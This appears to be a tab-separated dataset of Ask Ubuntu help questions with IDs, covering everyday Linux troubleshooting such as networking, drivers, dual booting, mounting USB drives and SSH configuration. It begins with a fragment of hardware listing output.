msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.12.0-031200rc7- generic firmware=0.37 ip=10.39.216.234 latency=0 link=yes multicast=yes wireless =ieee 802.11bgn resources : irq:16 memory:63510000-6351ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 05 serial : 84:34:97:8b:40 : ef size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=10.171.50.69 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:3000 ( size=256 ) memory:63404000-63404fff memory:63400000-63403fff
471213	renaming a bunch of files using command-line	suppose i have a folder with thousands of photos named all randomly . how can one rename them as photo1 , photo2 , ... , photo1000 from the command-line/terminal ?
471215	working with byobu splits	is there a way to start automatically a window with multiple splits running their own application using byobu ? am using tmux as the backend . also , how do i select the content of a split for pasting later ? when i tried this with the mouse.it also included the content of the adjacent split .
471216	how do i install utorrent on ubuntu 14.04 other instructions seem specific to older versions of the os	i have tried following some of the step by step instructions given but i think some of eh codes and instructions that need to be entered into the terminal window may be specifically for older versions of the ubuntu operating system
471224	the command 'juju status ' can not lookup nodes by name	problem : 1 ) juju bootstraped successfully ( mass server and all nodes on vm ) 2 ) i put my maas server ip as name server in resolv.conf , interfaces an hosts file of my juju server but when i try to `` juju status '' i get `` lookup n01.maas '' : no such host 3 ) here is the temporary solution : i put ip and name of nodes in `` hosts '' file it works 4 ) how can i fix the problem with nameservers and dns ? here is error : root @ ubuntu : /etc/network $ juju status error state/api : websocket.dial wss : //n01.maas:17070/ : dial tcp : lookup n01.maas : no such host error state/api : websocket.dial wss : //n01.maas:17070/ : dial tcp : lookup n01.maas : no such host
471226	icons on ubuntu server	hi can someone please assist me i have installed ubuntu server . after the install i installed the unity desktop using sudo apt-get install -- no-install-recommeds ubuntu-desktop . the desktop installed and it work great but it did not have any software on it , so i installed firefox throug the terminal . it installed and it works if i lauch it through the terminal but i cant find the icon anyware on ubuntu no icon . i have tried fixing it by resetting my unity desktop and try reinstalling it but no hope .
471229	omegat and java version	installed omegat from the software centre ( ubuntu 12.04 ) . when i try to start it , i just get the error message : suitable java binary not found . the output of java -version is : java version `` 1.7.0_55 '' java ( tm ) se runtime environment ( build 1.7.0_55-b13 ) java hotspot ( tm ) server vm ( build 24.55-b03 , mixed mode ) anybody have any ideas ? thanks peter
471230	after update on 12.04 , right speaker is not working on asus ?	my speakers were working fine until recent update on ubuntu 12.04 . my right speaker stopped working after update now only left speaker works . does anyone know how to fix this ? p.s speakers work on windows . ( dual boot ) regards
471234	cant get a wireless connection on ubuntu 14.04	i 'm using an acer aspire 5750z-4835 and cant get my wireless internet to work . it doesnt even list the network i 'm trying to connect to . i 'm a noob to linux , any help would be greatly appreciated . here 's some info from terminal that may help ubuntu @ ubuntu : ~ $ lspci -nn -d 14e4 : 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm57785 gigabit ethernet pcie [ 14e4:16b5 ] ( rev 10 ) 02:00.1 sd host controller [ 0805 ] : broadcom corporation bcm57765/57785 sdxc/mmc card reader [ 14e4:16bc ] ( rev 10 ) 02:00.2 system peripheral [ 0880 ] : broadcom corporation bcm57765/57785 ms card reader [ 14e4:16be ] ( rev 10 ) 02:00.3 system peripheral [ 0880 ] : broadcom corporation bcm57765/57785 xd-picture card reader [ 14e4:16bf ] ( rev 10 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm43227 802.11b/g/n [ 14e4:4358 ] ubuntu @ ubuntu : ~ $ iwconfig eth1 no wireless extensions . lo no wireless extensions . ubuntu @ ubuntu : ~ $ rfkill list all 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no
471235	how do i install chemsuite ? getting `` configure : error : ca n't find x includes '' when i attempt to compile	i extracted the tarball , cd'ed to the directory , ran ./build as per the install file in said directory directed me to do . but it told me i needed a package called `` x '' and i 've searched for such a package and ca n't find it . this is the exact message it gave me : ... checking for x ... configure : error : ca n't find x includes . please check your installation and add the correct paths ! done
471236	ubuntu 14.04 lts windows 8 guest macvtap setup	i have little experience with ubuntu and new to kvm . i have successfully installed kvm and used virt-manager to add the first guest . i have 4 ethernet ports on my server . for host server access and management , eth0 is the only interface configured in /etc/network/interfaces . i want to use the other 3 as dedicated for 3 vm guest machines . when i select advanced options during configuring a new machine , the virtual network 'default ' : nat and specify shared device name are the only 2 selectable options , but i can see host device eth0 ( not bridged ) host device eth1 ( not bridged ) , same for eth2 and eth3 , then host device macvtap0 ( not bridged ) . i select 'default ' nat . after guest is added , i can open details/nic and select host device eth1 : macvtap , then login to quest and assign a static ip in network settings . but i can not ping one guest from the other , or even ping the gateway . i have been researching this issue for a couple of weeks , so hopefully someone can clear the fog for me and help me move forward .
471243	installation errors	i know that there may be questions already asked and answered relating to this problem , but i do n't see them . i am trying to resurrect my old desktop system by switching to linux . but after using unetbootin to make a bootable usb key w/ubuntu 14.04 . ( i have used 2 other programs to make a bootable usb key with bot ubuntu 12.04 & 14.04 ) i get several errors either way that say that it could be a dirty dvd , and i need to clean it and try again . or it locks up and wo n't let me install . however it allows me to boot into a livecd session . as i write this , firefox keeps crashing , and is starting act just like running my current corrupted version of winxp . i went to the website to get a install dvd , but they are only available in 64bit , i need a 32bit install cd . so , my question is : what is the best program to make a usb key ? or , how can i get a better install disk that wo n't crash ?
471244	blank desktop on ubuntu 14.04 ( menu missing )	i had to shutdown my laptop unconventionally because of a programm error . now if i startup i receive just the blue desktop wallpaper , without any menus . ca n't even access the terminal . the right mouse button works and behaves normally and i can reach the settings . something with gnome ? i already tried sudo apt-get update sudo apt-get install ubuntu-desktop sudo apt-get install unity from the command line without any success . i also tried : sudo apt-get install -- reinstall ubuntu-desktop
471245	install dual-boot win7 alongside existing ubuntu install	i have ubuntu 14.04 lts installed on my laptop and i would like to install windows 7 home premium without uninstalling ubuntu . if this is not possible , is it possible to do a full backup to an iso file and then reinstall ubuntu with all of my programs still there ?
471250	dual external monitor bumblebee/nvidia ( or withoout bumblebee )	i have installed and configured bumblebee on my dell xps 17 with an nvidia gt555m . i would like to use my two external monitors with the laptop closed , but it 's giving me all sorts of difficulty . is there any way to do this ? i 've seen methods for 3 monitor setups , but none for the two external monitors . i would be equally happy to set up the monitors without bumblebee . one roadblock at the moment is that the ubuntu machine can not detect the hdmi to hdmi screen ( windows runs all 3 screens fine , so i do n't think it 's a hardware problem ) .
471253	swap partition missing or not found error ? how do i solve this error ?	no swap partition found . i get this error all the time and i have attached the picture of it . it appears when ubuntu 12.04 is starting and i got no idea how to solve it . i did create a swap partition when i was installing ubuntu 12.04 alongside with windows 7 . message at start up : the disk drive for /dev/mapper/crypyswap1 is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery . regards
471256	nvidia screen config	how do i restore the display config to the one i got during installation ? i 'm running ubuntu 14.04 with dual nvidia gtx 570 connected to two screens . when i installed ubuntu at first i ran 13.10 and everything worked right out of the box , marvelous . then i upgraded to 14.04 and after the first boot i was greeted with a single dialog window with something along the lines of `` could not detect your graphics settings '' . but after i rebooted they disappeared , but today they came back and did n't go away no matter the number of reboots . so i decided to try and fix them by installing the xorg-edgers ppa ( just added the ppa , then update and upgrade ) . now i never get that `` could not detect '' -dialog , lightdm always launches but only one screen activates , the resolution is terrible and after login unity never launches at all . i 've tried sudo nvidia-settings and sudo nvidia-xorg and restarting lightdm but neither seems to restore it to how it was . ubuntu-drivers devices | grep recommended tells me driver : nvidia-337 - third-party free recommended
471257	blinking cursor in the left when booting from the harddrive but works fine from flash drive	i am installing ubuntu for the first time . i got ubuntu installed on a flash drive and can boot from said drive . i have installed ubuntu on my hard drive as the only os on the hard drive . it does n't boot . it loads the hp loading screen and then goes to a blinking cursor in the upper left . holding shift or hitting escape does not bring up the grub menu . i am wondering what i did wrong . i ran boot repair did n't seem to help . here is the feedback file they provided . http : //paste.ubuntu.com/7506978/ thanks in advance , greg
471263	is there a need to upgrade ubuntu one client in 12.04 ?	i just tried doing a sudo apt-get upgrade in my 12.04 and i got this : the following packages will be upgraded : audacious audacious-plugins audacious-plugins-data gstreamer0.10-ffmpeg libaudclient2 libaudcore1 libsyncdaemon-1.0-1 numix-icon-theme-circle python-ubuntuone-client synapse ubuntuone-client since ubuntu one is being shut down , is there really any need to upgrade the ubuntuone-client or should i just purge it altogether ?
471264	ca n't mount a usb pen drive	it 's 4 gb usb pen drive . formatted ntfs . usb2 . works fine on windows on the same computer ( and others ) . it has the contents of a windows xp installation disc . ... i just can not mount it . when i connect it nothing happens but i believe ubuntu can see it . here are some command outputs last few lines from dmesg [ 164.703187 ] ieee80211 phy0 : rt2800usb_txdone : warning - got tx status for an empty queue 2 , dropping [ 554.953670 ] usb 1-4 : usb disconnect , device number 2 [ 565.092026 ] usb 1-4 : new high-speed usb device number 6 using ehci-pci [ 565.227144 ] usb 1-4 : new usb device found , idvendor=0951 , idproduct=1641 [ 565.227150 ] usb 1-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 565.227154 ] usb 1-4 : product : datatraveler c10 [ 565.227157 ] usb 1-4 : manufacturer : kingston [ 565.227160 ] usb 1-4 : serialnumber : 0019b9087cd7a9c1164b005c [ 565.227564 ] usb-storage 1-4:1.0 : usb mass storage device detected [ 565.228288 ] scsi4 : usb-storage 1-4:1.0 [ 566.228802 ] scsi 4:0:0:0 : direct-access kingston datatraveler c10 8.20 pq : 0 ansi : 2 [ 566.229160 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 [ 566.229950 ] sd 4:0:0:0 : [ sdb ] 7825408 512-byte logical blocks : ( 4.00 gb/3.73 gib ) [ 566.231158 ] sd 4:0:0:0 : [ sdb ] write protect is off [ 566.231164 ] sd 4:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 566.231904 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 566.231910 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 566.237756 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 566.237762 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 567.282038 ] sdb : unknown partition table [ 567.287030 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 567.287036 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 567.287040 ] sd 4:0:0:0 : [ sdb ] attached scsi removable disk the part concerned with the device from sudo fdisk -l disk /dev/sdb : 4006 mb , 4006608896 bytes 255 heads , 63 sectors/track , 487 cylinders , total 7825408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0066cd1f this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 63 7825407 3912672+ 7 hpfs/ntfs/exfat sudo blkid does n't show the device tried to mount it with those commands : sudo mount /dev/sdb1 /media/somefolder/someotherfolder but it gives mount : special device /dev/sdb1 does not exist and ; sudo mount -t ntfs /dev/sdb1 /media/somefolder/someotherfolder ntfs-3g : failed to access volume '/dev/sdb1 ' : no such file or directory ntfs-3g 2013.1.13ar.1 external fuse 29 - third generation ntfs driver configuration type 7 , xattrs are on , posix acls are on copyright ( c ) 2005-2007 yura pakhuchiy copyright ( c ) 2006-2009 szabolcs szakacsits copyright ( c ) 2007-2012 jean-pierre andre copyright ( c ) 2009 erik larsson usage : ntfs-3g [ -o option [ , ... ] ] < device|image_file > < mount_point > options : ro ( read-only mount ) , windows_names , uid= , gid= , umask= , fmask= , dmask= , streams_interface= . please see the details in the manual ( type : man ntfs-3g ) . example : ntfs-3g /dev/sda1 /mnt/windows news , support and information : http : //tuxera.com sudo ntfs-3g /dev/sdb1 /media/somefolder/someotherfolder gives exactly the same output as above . pmount /dev/sdb1 kingston gives ; error : device /dev/sdb1 does not exist please help edit ! `` disks '' sees the device ! ! ( the kingston one ) ... but what next ? edit : output of sudo mount -t ntfs -o loop=/dev/loop3 /dev/sdb /mnt ntfs signature is missing . failed to mount '/dev/loop3 ' : invalid argument the device '/dev/loop3 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ?
471267	user upstart session in different window manager window manager	i am using ubuntu 14.04 and i3 as window manager . after i have logged in to i3 , upstart wo n't find my user jobs under ~/.config/upstart/ . how can i make upstart find these config files without having to execute something like gnome-session ? thanks . edit , one of the jobs starts redshift , here is the config ~/.config/upstar/redshift.conf : respawn exec redshift -l 59:18 when i try to start this job with initctl start redshift : initctl : unknown job : redshift
471272	indicator-synapse errors when accelerator pressed	i 'm running 14.04 and i really like indicator-synapse , which i installed from the noobslab/apps ppa . however when i press the < alt > < super > space shortcut which seems to be the default to focus the search field , not only nothing happens , but after a short while a window pops out of nowhere telling me my disk free space is running low . i investigated a bit and found out that there 's a log file at ~/.cache/upstart/unity-panel-service.log which all of a sudden appears to have grown in size by ~7 gb . i did a tail -f on the abovementioned log file and pressed < alt > < super > space , which is the shortcut apparently used by indicator-synapse ( at least that 's the default value defined under net.launchpad.synapse-project.indicator as visible in dconf-editor ) . the applet did n't open and the log file started rapidly populating with the following two messages : [ 20:50:26.360967 glib-gobject-warning ] invalid ( null ) pointer instance [ 20:50:26.360999 glib-gobject-critical ] g_signal_emit_by_name : assertion 'g_type_check_instance ( instance ) ' failed anyone got any ideas how to fix this ? without the keyboard shortcut the applet is n't half as useful . i 'm not quite sure where to report this as a bug as the launchpad bugs page for noobslab seems quite empty and i 've found nowhere else to file it . sorry if this is the wrong place to turn to o : - )
471273	what program has this icon ?	i noticed a screenshot that included this icon in the sidebar , does anyone know what it 's from ? it looks cool ! looks vaguely reminiscient of chrome but different enough that it could be a coincidence . i 've tried putting it into a google image search but without any luck . original source was this ubuntu help page on unity launchers . which includes the original , larger screenshot . for context , it 's not important , i 'm just curious .
471275	how to install all gparted file systems ?	when i open my gparted and go to view - > file system support , i get this : how to remove all crosses and get all check marks instead , or in other words , how to install all missing file system extensions . i installed some by googling , but how to install them all ?
471276	is it possible to use the same java application with out any changes as a charm ?	i have a general question : i have a application ( for example generate some output file from some input data ) is it possible to use same java application with out any changes as a charm , by other words i mean is it possible to put that app ( java console app ) on charm template ? or i need to change or rewrite my application to work in charm and juju architecture ? does the node.js is my solution ? what is the best way to do this ?
471282	is it possible to execute a .desktop file from a quicklist ?	i have this launcher i created with a quicklist full of options to execute different applications . one of the options is teamviewer and this is the quicklist code for it : [ desktop action fav-teamviewer ] name=teamviewer exec=/opt/teamviewer9/tv_bin/script/teamviewer onlyshowin=unity this works perfectly , but what if i wanted to execute the `` teamviewer.desktop '' file directly ? something like this ... [ desktop action fav-teamviewer ] name=teamviewer exec=/usr/share/applications/teamviewer.desktop onlyshowin=unity i 've tried it , but it wo n't work . why is it not working ? am i doing it wrongly or is it impossible to be done ? the reason i want to do it is that if i run teamviewer normally , from the dash , its icon on the launcher is perfect ( first image ) ; but if i run it from that quicklist option , it loses its default icon and gets the generic wine application icon ( second image ) . please , see screenshots for a better understanding . i hope you can help me . thanks for your attention .
471285	how to create & execute a script file	is there a way to create and execute a script file in ubuntu 14.04 ? perhaps something like windows batch files . specifically , i mean the default scripting language of the ubuntu terminal ( bash ) . how do you make a text file containing bash commands which will be run by the ubuntu terminal from the top of the file to the bottom .
471289	power-failure during update and now a black screen , wo n't boot	my computer shut down during an update because of a power outage . after rebooting the computer , nothing but a blank , black screen is displaying with a fixed mouse in the centre of the screen . can this be fixed or do i need to re-install ?
471291	how do i enable hardware rendering in ubuntu 14.04 on an intel 4600	the only thing i 've seen on this is this tutorial here : http : //ubuntuhandbook.org/index.php/2013/10/enable-hardware-acceleration-on-intel-graphics-cards-in-ubuntu/ , but that 's from last year , and i thought after 13 , ubuntu automatically picked up graphics card drivers ? also , /usr/lib/nux/unity_support_test -p is how i know hardware rendering is n't working . also , i looked for nomodeset in my grub config file , and it was n't there .
471293	what 's wrong with this thumbnailer ?	i want nautilus to generate thumbnails for my .psd files so i put [ thumbnailer entry ] tryexec=convert exec=convert % i [ 0 ] -resize % s % o mimetype=image/vnd.adobe.photoshop ; image/x-psd ; in /usr/share/thumbnailers/photoshop.thumbnailer but nautilus is amazing and instead of thumbnails i get ( nautilus:15745 ) : gnomedesktop-warning ** : unable to create loader for mime type image/vnd.adobe.photoshop : unrecognized image file format
471294	`` action not available : turn off computer '' while using kshutdown	i have some trouble with kshutdown . when i choose to turn off the computer , kshutdown sends me an error . it looks like this : action not available : turn off computer no valid org.freedesktop.consolekit interface found what should i do ?
471296	is it possible to have a shortcut to switch to the nth xfce-tasklist window in xubuntu like in windows ?	one of my favorite features in windows is the ability to press -1 to switch to the leftmost window in the `` window buttons '' , -2 to go to the 2nd one , and so on , as opposed to alt-tabbing through everything . i remember reading that i could assign a script to a key combination to switch to a specifiy window title , but i 'd like to be able to switch based on its position in the taskbar . ( also i think unity can do this , but i 'd really rather stick with xfce )
471297	wxmaxima assertion failed error	trying to install wxmaxima on a fresh installation of 14.04. maxima is installed successfully from the repository . i follow the instructions here , section ii : compiling your own wxmaxima package . downloaded wxmaxima-13.04.02.tar.gz from here i get no errors during installation . when trying to run wxmaxima , i get an assertion failed error . full error traceback : assert info : ../src/common/menucmn.cpp ( 982 ) : assert `` item '' failed in enable ( ) : attempt to enable an item which does n't exist backtrace : [ 1 ] wxmenubarbase : :enable ( int , bool ) [ 2 ] wximagehandler : :~wximagehandler ( ) [ 3 ] wxappconsolebase : :calleventhandler ( wxevthandler* , wxeventfunctor & , wxevent & ) const [ 4 ] wxevthandler : :processeventifmatchesid ( wxeventtableentrybase const & , wxevthandler* , wxevent & ) [ 5 ] wxeventhashtable : :handleevent ( wxevent & , wxevthandler* ) [ 6 ] wxevthandler : :tryhereonly ( wxevent & ) [ 7 ] wxevthandler : :dotrychain ( wxevent & ) [ 8 ] wxevthandler : :processevent ( wxevent & ) [ 9 ] wxmenubase : :updateui ( wxevthandler* ) [ 10 ] wxmenubarbase : :updatemenus ( ) [ 11 ] wxtoplevelwindowgtk : :oninternalidle ( ) [ 12 ] wxframebase : :oninternalidle ( ) [ 13 ] wxwindowbase : :sendidleevents ( wxidleevent & ) [ 14 ] wxframe : :sendidleevents ( wxidleevent & ) [ 15 ] wxappbase : :processidle ( ) [ 16 ] wxapp : :doidle ( ) [ 17 ] g_main_context_dispatch [ 18 ] g_main_loop_run [ 19 ] gtk_main [ 20 ] wxguieventloop : :dorun ( ) [ 21 ] wxeventloopbase : :run ( ) [ 22 ] wxapptraits : :runloopuntilchildexit ( wxexecutedata & , wxeventloopbase & ) [ 23 ] wxguiapptraits : :waitforchild ( wxexecutedata & ) [ 24 ] wxexecute ( char** , int , wxprocess* , wxexecuteenv const* ) [ 25 ] wxexecute ( wxstring const & , int , wxprocess* , wxexecuteenv const* ) [ 26 ] wximagehandler : :~wximagehandler ( ) [ 27 ] wximagehandler : :~wximagehandler ( ) [ 28 ] wximagehandler : :~wximagehandler ( ) [ 29 ] wximagehandler : :~wximagehandler ( ) [ 30 ] wxappconsolebase : :calleventhandler ( wxevthandler* , wxeventfunctor & , wxevent & ) const [ 31 ] wxevthandler : :processeventifmatchesid ( wxeventtableentrybase const & , wxevthandler* , wxevent & ) [ 32 ] wxeventhashtable : :handleevent ( wxevent & , wxevthandler* ) [ 33 ] wxevthandler : :tryhereonly ( wxevent & ) [ 34 ] wxevthandler : :processeventlocally ( wxevent & ) [ 35 ] wxevthandler : :processevent ( wxevent & ) [ 36 ] wxevthandler : :processpendingevents ( ) [ 37 ] wxappconsolebase : :processpendingevents ( ) [ 38 ] wxapp : :doidle ( ) [ 39 ] g_main_context_dispatch [ 40 ] g_main_loop_run [ 41 ] gtk_main [ 42 ] wxguieventloop : :dorun ( ) [ 43 ] wxeventloopbase : :run ( ) [ 44 ] wxdialog : :showmodal ( ) [ 45 ] wxshowtip ( wxwindow* , wxtipprovider* , bool ) [ 46 ] wximagehandler : :~wximagehandler ( ) [ 47 ] wxformatstring : :~wxformatstring ( ) [ 48 ] wxformatstring : :~wxformatstring ( ) [ 49 ] wxentry ( int & , wchar_t** ) [ 50 ] __libc_start_main any ideas what could have gone wrong ? thanks .
471302	how we can define more than 2 dns server ( ip ) in maas ?	in `` upstream dns used to resolve domains not managed by this maas '' there is just one ip definition for dns !
471303	ubuntu wired connection disconnected	my wired connection is disconnected , it was working perfectly until two hours ago , now i ca n't get it established . i 'm using ubuntu 12.04 this is my ifconfig : ifconfig eth0 link encap : ethernet hwaddr 18:03:73:5b:4d : c9 inet6 addr : fe80 : :1a03:73ff : fe5b:4dc9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8027 errors:0 dropped:0 overruns:0 frame:0 tx packets:1260 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2586648 ( 2.5 mb ) tx bytes:271453 ( 271.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1489 errors:0 dropped:0 overruns:0 frame:0 tx packets:1489 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:120803 ( 120.8 kb ) tx bytes:120803 ( 120.8 kb ) wlan0 link encap : ethernet hwaddr cc : af:78:43:84:43 inet addr:192.168.43.80 bcast:192.168.43.255 mask:255.255.255.0 inet6 addr : fe80 : :ceaf:78ff : fe43:8443/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:33351 errors:0 dropped:0 overruns:0 frame:0 tx packets:21387 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:38779028 ( 38.7 mb ) tx bytes:2683486 ( 2.6 mb ) < / $ > nmcli dev : device type state wlan0 802-11-wireless connected eth0 802-3-ethernet disconnected cat /etc/network/interfaces auto lo iface lo inet loopback
471307	internal microphone difficulty , after multiple various attempts , no success	i am currently running 14.04 on a brand new asus k550l , and i ca n't get the internal microphone to work . i 've tried messing with alsa , the sound section of system settings , pulseaudio volume control , the terminal command alsamixer , pavucontrol and pavumeter , the terminal command gstreamer-properties , gnome alsa , and ( using skype test calling at least ) . i 've yet to have any success . any ideas or suggestions ?
471310	how to update dual boot windows 7 / ubuntu 13.04 to 14.04	i currently have ubuntu 13.04 installed , dual boot with windows 7 i am unsure of how to do a clean install of ubuntu 14.04 as a dual boot with windows 7 ( i dont mind loosing the entire ubuntu/linux partitions for a clean install ) any suggestions or guidance would be most welcome thank you edit : - thank you all ( i am editing/ to update this question as suggested clayton ) , i need to delete another partition , i tried to install 12.04 lts and need to remove that ideally , i would like to do a clean install of all and remove ubuntu completely , than a fresh install of 14.04 ( and this time with a more space allocated ) apologies i did not mention this earlier
471314	firefox keeps going unresponsive and crashing	ubuntu 14.04 32 bit up to date . i was recently hacked . had to clean install from a live usb made off my network and network computers . since clean installing firefox keeps going unresponsive and crashing . it 's the same with the open source and proprietary video drivers . firefox add-ons : no-script , adblock plus , https everywhere .
471316	share windows server drive for xbmc	i have a windows server 2008 on my home network . it hosts my xampp installation along with my mysql databases . i have xbmc installed on all clients and we share the same drive where the media is located . the database keeps track of everything including path to all media files . this is a windows path ie : z : \\myfolder\thismediafile ... is there any possible way to tell ubuntu to use the path that is already set ? maybe name a network connection ? -- thanks
471318	how to uninstall steam64 for linux/ubuntu ?	i 'm seeing people say things like sudo apt-get remove steam and sudo dpkg -r steam but neither are working . i ran dpkg-query -l *steam* and i get the following : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= un steam < none > < none > ( no description available ) rc steam-launcher 1.0.0.47 all launcher for the steam software d un steam64 < none > < none > ( no description available ) not sure if this helps . the steam faq does n't seem to help either . i 'm pretty sure i did n't do any apt-get install for steam . i downloaded the steam_latest.deb from the website . any ideas ? update : i do have what i believe to be the folder in ~/.steam . what i 'm wondering now is , if i remove this folder , what else do i need to remove ?
471321	how to use a theme .	when i downloaded a theme , .tar.gz or .gz or some kind of format like that . when i opened it , it was just a folder full of files . how do i make it a theme or something ?
471322	ca n't change ssh port ( trusty 14.04 )	i 've been trying to change my ssh port without success and none of the suggestions i 've found did the trick for me . i 'm on trusty 14.04 at rackspace ( upgraded from precise ) . this is the sequence of steps i 've taken to change the ssh port i just ca n't seem to change the port ssh is listening on . changed sshd_config allowusers abc port 9603 reloaded sshd sudo /etc/init.d/ssh restart opened the firewall sudo ufw enable sudo ufw allow 9603 sudo ufw reload but i always get connection refused when i try to connect . ssh abc @ 1.2.3.4 -p 9603 when i run netstat -an | grep `` listen `` , i get tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp6 0 0 : ::80 : : : * listen tcp6 0 0 : ::22 : : : * listen for some reason , it looks like ssh is not changing ports despite my changes . any suggestions ? i have no moves left
471327	subdomain configuration on ubuntu nginx server	first of all , i 'm sorry for my bad english . i 'll try to explain my aim as much as possible . i 'm using a 2 core and 2 gb memory vps with 1 dedicated ip address from digital ocean for my project . i 'm using nginx as a web server , mysql as a database server and bind as a dns server . my project is a free hosting platform for educational purposes . i 'll be teaching php and mysql to students from my neighborhood and i want them to practice on their own subdomain with a php and mysql support . for example , my main domain name is : example.com i 'll also setup a wildcard ssl for my domain . for example , student subdomain should be like this : student1.example.com students will be able to activate their web space with the subdomain they choose automatically using my setup script which is written in php ( a simple page ) . how can i achieve this setup without using any control panel like cpanel or `zpanel ? how can any subdomain which is chosen by a student resolve my main domain ? can students use their own tld domain on a setup like this ? do you have any suggestions for this kind of setup ?
471328	shared folders vmware not showin up	when i go to /mnt/hgfs nothing shows up . i have vmware tools installed and when i run vmware-hgfsclient i get a list of shared folders .
471330	increasing mouse speed	running ubuntu 14.04 lts . i have ubuntu on my laptop , as well as here , my desktop . the laptop has the ability to change the speed of the mouse cursor , while the desktop does not . both are running the same version of ubuntu . the only difference being the laptop has only the mouse running from the usb and the desktop having a mouse and keyboard . i 've tried this in the terminal , so far , without any noticeable change when changing the final number . xinput -- set-prop- 4 `` device accel constant deceleration '' 1 i got the number id number from , xinput -- list -- short . like it said in this question/answer : how to change mouse speed/sensitivity ? thanks for any response , if you need further information , please ask . i was n't to sure what is needed .
471334	windows workgroup	recently installed ubuntu 14.04 lts and installed updates with sudo apt-get install update . i am trying to join ubuntu workstation to my windows workgroup to access shared folders on a windows 7 pc . what is the best method to do this ? this is a home network . thanks .
471335	good desktop drawing program other than nautilus ?	i 'm looking for an application/service that provides a usable desktop ( icons , etc . ) and takes its directory from ~/desktop ( running a custom ubuntu installation where nautilus was broken and so removed ) . any suggestions are welcome .
471339	get directory-specific nautilus preferences on 14.04 lts	unsure how to word this , but is there anyway for ubuntu to display certain folders , certain ways . i have alot of holiday/family shots , in a large number of folders named after where they from . so when browsing through the main folder i like the list view so i can easily just scroll down looking at the names . however when i open the folder which has only images in , is there anyway for it to automatically change to a large grid format ? so basically is there a way for me to add a preference , to a folder with certain files within ? i have done some searches , but i ca n't seem to find anything like this . i am running ubuntu 14.04 lts
471340	i 'm trying to run an executable file via ssh but its saying `` no such file or directory ''	i 'm trying to run an executable file via ssh . its saying `` no such file or directory '' but the file exists . what i 'm doing wrong ? sorry , i 'm a noob with linux root @ v-8966 : /home/talisman/db # ls -l output of ls -l : total 20804 -rwxr-xr-x 1 root root 11854528 may 27 17:06 db_server [ in green ] -rw-r -- r -- 1 root root 365 may 27 17:06 db_server_user.ini -rw-r -- r -- 1 root root 371 may 27 17:06 db_server_user.ini~ -rw-r -- r -- 1 root root 9382181 may 27 17:07 guard -rw-r -- r -- 1 root root 252 may 27 17:06 guard_user.ini -rw-r -- r -- 1 root root 252 may 27 17:06 guard_user.ini~ drwxr-xr-x 2 root root 4096 may 27 17:21 log [ in blue ] -rw-r -- r -- 1 root root 126 may 27 17:06 run.sh -rw-r -- r -- 1 root root 119 may 27 17:06 run.sh~ root @ v-8966 : /home/talisman/db # total 20804
471342	firefox does not load local html files kubuntu 14.04	i have used kubuntu ( 10.04 & 12.04 ) and firefox for many years . recently i upgraded to 14.04 and firefox will no longer open local html files . i installed chromium and it seems to work properly . since firefox has always been my preferred browser is anyone aware of a fix for this problem ?
471343	lost title bar after installing nvidia driver	i tried install nvidia driver by many different way . ( by file .run , xorg edgers ppa , by additional driver ) but i alway get error lost title bar , no close/minimize/maximize buttons ( although successful installation ) . it look like this :
471345	install ubuntu 14.04 on macbook 11,1	i 'm trying to install ubuntu 14.04 on my mbp 11,1 using tutorial in https : //help.ubuntu.com/community/macbookpro11-1/saucy at step 5 : i did n't restart as mentioned , and when i try to download & install efibootmgr to fix boot order , it gives me error not able to install efibootmgr , and in fact every thing happen after installation will done in the usb not in the new installed ubuntu . when i reboot , choosing the ubuntu partition from boot menu to start i got blank screen and never start . any ideas how to fix
